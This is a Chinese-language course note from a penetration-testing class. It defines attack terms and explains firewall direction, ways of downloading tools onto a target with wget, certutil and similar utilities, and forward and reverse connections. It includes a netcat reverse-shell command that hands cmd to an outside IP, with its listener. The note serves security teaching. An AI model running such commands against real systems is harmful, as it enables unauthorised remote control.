小迪安全第一天

一、常用的专业术语

参考：
https://www.cnblogs.com/sunny11/p/13583083.html

• POC（proof of concept）验证漏洞的代码
• EXP(exploit) 利用对一段漏洞代码的利用
• Playload:有效载荷，当利用exploit成功后如何通过一个管道把这个权限给到你，在真正目标系统执行的代码或指令
• Shellcode:shell代码是playload的一类，建立正向/反向shell而得名。
• 后门/webshell：入侵者通过某种手段攻破了目标主机，可以在对方系统中植入某段程序代码以达到访问控制/查看控制该主机。
• 木马（攻击者）：伪装称正常的程序，当该程序运行时，获取用户所有的权限达到控制该用户主机
• 病毒：简单来说就是破坏性的程序，中了病毒就开始破坏你的电脑
• 反弹：将权限移交到其它服务器或地址上去，用其它来实施控制
  跳板：相当于一个中介，用于连接另一个主机/服务器，一个具有辅助作用的机器，利用这个主机作为一个间接工具，来入侵其他主机，一般和肉鸡连用。
• 黑白盒测试：黑盒测试只有一个目标没有源代码，百盒则相反。
• 社会工程学：根据人性的弱点，一种无需依托任何黑客软件，更注重研究人性弱点的黑客手法正在兴起，这就是社会工程学黑客技术。通俗而言是指利用人的社会学弱点实施网络攻击的一整套方法论，其攻击手法往往出乎人意料
• 撞库：利用网络中某云等泄露的数据库，包含着用户的各种信息，在某些搭建的社工库中可以输入某人的电话邮箱等关键信息来查看某人的状态和某些密码。
• ATT&CK：根据此MITRE ATT&CK® 可以查某些漏洞等转悠名词，以此来详细写渗透报告。

二、演示案列

基础案例1：操作系统-用途&命令&权限&用户&防火墙

• 个人计算机&服务器用机

• Windows&linux常见命令 网站参考：【3】web安全入门篇-渗透测试中常用的命令_web安全入门篇
  渗透测试中常用的命令-CSDN博客

• 文件权限&服务权限&用户权限等：为完成某种情况，需要对权限提升从而得到某个文件的内容。

• 系统用户&用户组&服务用户等分类

• 自带防火墙出站&入站规则策略协议

一般电脑默认的防火墙实行宽出进严
在web攻防中因为使用的时ip等协议，使得防火墙对这些协议是默认允许的基本没有什么阻碍,防火墙的策略是允许这些行为的
在进行内网渗透测试时，不仅有web上的协议还有其它等协议，正是防火墙要阻止的协议，意义说防火墙起到了真正的左右。

实用案例1：文件上传下载-解决无图形化&解决数据传输

• 解决无图形其实都是命令行，如后期要上传攻击的工具到对方服务器上运行以命令的形式上传。
  网站工具及命令输入形式等：ywhack.com
• Linux：wget curl python ruby perl java等

自己搭建一个网站里面有各种工具资料通过wget命令等下载到对方主机上去。

• Windows：powershell certutil bitsadmin msiexec mshta rundll32等

在widows下载过程中可能下载失败，原因可能在当前用户下没有权限，可以换到c:\temp下

实用案列2：反弹shell命令-解决数据回显&解决数据通讯

• 有些渗透测试中大部分是没有回显的，有些工具通过命令发送过去是否成功自己并不知道，
• Useradd用户名 passwd 用户密码 测试linux系统添加用户或修改密码命令交互回显问题

结合案列1：防火墙绕过-正向连接&反向连接&内网服务器

• 反弹shell在windows下的命令 ：nc -e cmd 192.12.4.5
  445意思是把cmd命令的权限移交给192.12.4.5 445的服务器上，在此服务器上可以使用nc -lvvp 445 来监听455端口

内网： 内网——> xiaodi8 Xiaodi8 !->内网 解决方案：因为路由器中有端口转发/端口映射的功能，在路由器中做一个策略，把武器通过指定端口交给主机，简单解释为外网找到内网的网关（路由器）的端口从而将数据交到指定主机上去。

防火墙： Xiaodi8<->aliyun Xiaodi防火墙->aliyun aliyun!->xiaodi8防火墙 解决方案：正向连接/反向连接

#结合案列：fofa拿下pikachu服务器 文件下载&反弹shell

总结

今日学习之思维导图

学习总结来源于：小迪安全